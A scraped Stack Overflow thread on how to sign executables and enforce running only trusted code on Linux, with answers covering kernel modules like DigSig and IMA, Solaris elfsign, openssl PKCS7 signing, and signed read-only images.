Signed executables under Linux

[亡魂溺海] 提交于 2019-11-26 19:11:55

问题


For security reasons, it is desirable to check the integrity of code before execution, avoiding tampered software by an attacker. So, my question is

How to sign executable code and run only trusted software under Linux?

I have read the work of van Doom et al., Design and implementation of signed executables for Linux, and the IBM's TLC (Trusted Linux Client) by Safford & Zohar. TLC uses TPM controller, what is nice, but the paper is from 2005 and I was unable to find current alternatives.

Do you know another options?

UPDATE: And about other OS's? OpenSolaris? BSD family?


回答1:


The DigSig kernel module implements verification of binaries signed by a tool called bsign. However, there hasn't been any work on it since version 2.6.21 of the Linux kernel.




回答2:


I realize this is an ancient question but I just now found it.

I wrote signed executable support for the Linux kernel (around version 2.4.3) a while back, and had the entire toolchain in place for signing executables, checking the signatures at execve(2) time, caching the signature validation information (clearing the validation when the file was opened for writing or otherwise modified), embedding the signatures into arbitrary ELF programs, etc. It did introduce some performance penalties upon the first execution of every program (because the kernel had to load in the entire file, rather than just demand-page the needed pages) but once the system was in a steady-state, it worked well.

But we decided to stop pursuing it because it faced several problems that were too large to justify the complexity:

  • We had not yet built support for signed libraries. Signed libraries would require also modifying the ld.so loader and the dlopen(3) mechanism. This wasn't impossible but did complicate the interface: should we have the loader ask the kernel to validate a signature or should the computation be done entirely in userspace? How would one protect against a strace(2)d process if this portion of the validation is done in userspace? Would we be forced to forbid strace(2) entirely on such a system?

    What would we do about programs that supply their own loader?

  • A great many programs are written in languages that do not compile to ELF objects. We would need to provide language-specific modifications to bash, perl, python, java, awk, sed, and so on, for each of the interpreters to be able to also validate signatures. Since most of these programs are free-format plain text they lack the structure that made embedding digital signatures into ELF object files so easy. Where would the signatures be stored? In the scripts? In extended attributes? In an external database of signatures?

  • Many interpreters are wide open about what they allow; bash(1) can communicate with remote systems entirely on its own using echo and /dev/tcp, and can easily be tricked into executing anything an attacker needs doing. Signed or not, you couldn't trust them once they were under control of a hacker.

  • The prime motivator for signed executables support comes from rootkits replacing the system-provided /bin/ps, /bin/ps, /bin/kill, and so on. Yes, there are other useful reasons to have signed executables. However, rootkits got significantly more impressive over time, with many relying on kernel hacks to hide their activities from administrators. Once the kernel has been hacked, the whole game is over. As a result of the sophistication of rootkits the tools we were hoping to prevent from being used were falling out of favor in the hacking community.

  • The kernel's module loading interface was wide-open. Once a process has root privilege, it was easy to inject a kernel module without any checking. We could have also written another verifier for kernel modules but the kernel's infrastructure around modules was very primitive.




回答3:


The GNU/Linux/FOSS model actually encourages tampering -- of a sort. Users and distro-makers must be free to modify (tamper with) the software to suit their needs. Even just recompiling the software (without changing any source code) for customization is something that is done quite often, but would break binary code-signing. As a result, the binary code-signing model isn't particularly well suited to GNU/Linux/FOSS.

Instead, this kind of software relies more on generating signatures and/or secure hashes of the source packages. In combination with a reliable and trusted package distribution model, this can be made just as secure (if not more so, vis-à-vis transparency into the source code) as binary code-signing.




回答4:


Have a look at this: http://linux-ima.sourceforge.net/

It's not signing yet, but it still enables verification.




回答5:


I can answer the question from a Solaris 10 & 11 OS perspective, all binaries are signed. To verify the signature use 'elfsign'...

$ elfsign verify -v /usr/bin/bash
elfsign: verification of /usr/bin/bash passed.
format: rsa_sha1.
signer: O=Oracle Corporation, OU=Corporate Object Signing, OU=Solaris Signed Execution, CN=Solaris 11.
signed on: Fri Oct 04 17:06:13 2013.

Oracle have recently added a verified boot process for Solaris 11 too, for details see - Solaris Verified Boot Introduction

There are some production grade forks of the OpenSolaris code, three worth investigating are Illumos, SmartOS and OmniOS.




回答6:


Take a look at Medusa DS9. I played with it a long (long) time ago, but if I remember correctly, you could register specific binaries and any modification was not allowed at the kernel level. Of course, it can be overridden with local access to the machine, but it was not really easy. There's a smart daemon, called constable, checking everything that happens on the machine and if something out of the ordinary occurs, it start screaming.




回答7:


I've never tried it, but take a look at : http://blog.codenoise.com/signelf-digitally-signing-elf-binaries. The solution works without needing kernel support, and looks like to be ready to go.

The code for the signer can be found at http://sourceforge.net/projects/signelf/

It does not solve the "Run only trusted code on linux" question, but it does partially solve the problem by making a way for the program to detect itself a possible tampering/corruption




回答8:


http://en.wikipedia.org/wiki/PKCS

Use a PKCS7 (S/MIME) sign of it. Generate your own cert/private key pair, self-sign the cert and then sign your file with the private key and cert using PKCS7. It'll attach the cert to it, and then it can check itself at runtime using the openssl command (man smime or just do openssl help). This is tamperproof because even though the public key is in the files you give out, the S/MIME signature for that public key can only be generated with the private key which you won't distribute. So if the file is signed by your cert, it must have been signed by someone with the private key and since you didn't give the private key to anyone, it must have come from you.

Here's how to make the self-signed certificate.

http://www.akadia.com/services/ssh_test_certificate.html

You'll have to convince openssl to trust your cert as a root of authority (-CAfile), then check it with that as the root, and also check the cert on the file is yours (hash the cert) and check the hash. Note that although it isn't documented, the exit status of openssl reflects the validity of the sign you are checking when doing an smime verify. It's 0 if it matches, non-zero if it doesn't.

Note that all of this is not secure because if the check is in your code, they can simply remove the check if they want to beat you. The only secure way to do it would be to have the checker in the OS and have it check your binary and refuse to run it if it isn't signed. But since there is no checker in the OS and linux can be modified to remove/bypass it anyway... What this is really good for is just detecting corrupt files more than trying to keep people from bypassing you.




回答9:


I agree that the philosophy surrounding Linux, GNU et al. revolves around tinkering. On the other hand, I also believe that some systems deserve protection against vulnerabilities such as software tampering, which can undermine the privacy and integrity of a system's users.

Kernel implementations cannot keep up with the rapid development cycle of the kernel itself. I recommend instead to implement a form of executable file signature verification using userspace tools. Place executables in an archive or filesystem image and sign the image using a private key; if that private key stays on your development machines (private), when your server gets hacked, attackers still have no way to sign their own images and inject their code without tricking the system to mount unsigned images. It extends further along the chain:

  • have your services contained into runtime-mounted read-only images;
  • have the machine run off of a signed, read-only filesystem;
  • implement secure boot on your machines, running a bootloader that enforces the integrity of the boot media;
  • trust that the people in your organization will not tamper with your machines.

Getting everything right is a hard endeavor. It is much simpler to work around it all by designing your system under another approach:

  • quarantine users from the system. Do not introduce means for users to execute commands on your system. Avoid shelling out from inside the programs that rely on user-fed data.
  • design your deployment procedures using configuration management and ensure that your deployments are "repeatable", meaning that they lead to the same functional result when you deploy them several times. This allows you to "nuke from orbit" machines that you suspect have been compromised.
  • treat your machines as if they were compromised: regularly run audits to verify the integrity of your systems. Save your data on separate images and redeploy systems regularly. Sign images and have systems reject unsigned images.
  • use certificates: favor a "certificate pinning" approach. Do deploy a root certificate for your applications (which will provide automatic rejection of signatures that have not been certified by your organization) but at the very least have the system manage fingerprints of current images and notify administrators when fingerprints have changed. Although it is possible to implement all this using chains of keys, certificate-based authentication has been designed for this exact application.



回答10:


I like to think to security as a chain. The weaker link of the chain can compromise the whole system. So the whole thing become "preventing an unauthorized user from obtaining the root password".

As suggested by @DanMoulding the source of the software is also important and in the future probably official OS application stores will be the standard. Think about Play Store, Apple or Microsoft stores.

I think installation and distribution of covert malicious code is the far more insidious problem. After all, in order to load bad code it's got to first be installed on the system somewhere. More layers of security are usually better, of course. The question is: is it worth the cost?

In my opinion the answer is "it depends". You can reduce the risk by adopting a set of security policies as suggested by @sleblanc. You can encrypt your file system (https://en.wikipedia.org/wiki/Linux_Unified_Key_Setup), use read-only file systems for the binaries or use a mechanism to sign and verify the binaries.

However whatever mechanism you use there is nothing you can do once the root access is obtained by an attacker. The signature verification tools can be replaced with a tampered version or just disabled and it doesn't really matter if the tools run in user-space or kernel-space once that the machine has been compromised (although the latter would be more secure of course).

So it would be nice if the Linux kernel could embeds a signature verification module and another security layer between the root user and the operating system.

For example this is the approach adopted on the recent macOS versions. Some file can't be modified (and sometimes read) even by the root account and there are restrictions also on the policies and kernel modules (e.g. only signed or authorized kext can be loaded on the system). Windows adopted more or less the same approach with AppLocker.



来源:https://stackoverflow.com/questions/1732927/signed-executables-under-linux

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!